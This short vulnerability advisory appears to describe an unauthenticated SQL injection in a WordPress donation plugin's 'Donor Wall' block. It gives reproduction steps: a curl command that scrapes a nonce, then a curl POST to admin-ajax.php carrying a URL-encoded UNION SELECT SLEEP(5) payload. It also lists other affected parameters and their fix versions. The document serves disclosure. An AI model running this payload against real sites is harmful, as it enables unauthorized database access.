The plugin does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks
1) Create a post/page that contains the "Donor Wall" block.
2) Using the default donation form, send a test donation
3) In a terminal, edit and run the following command, and copy the nonce it gives you
curl -s --url 'http://vulnerable-site.tld/donor-wall-post-we-created-earlier/' | grep -o 'data-nonce="[a-f0-9]*"'
4) Still in the terminal, edit and run the following command:
curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST --data-raw 'action=give_get_donor_comments&nonce=c734a76f44&data=form_id%3D%27%29%20UNION%20%28SELECT%20SLEEP%285%29%29%23'
Other affected parameters: ids (fixed in 2.24.0), donors_per_page (fixed in 2.24.1)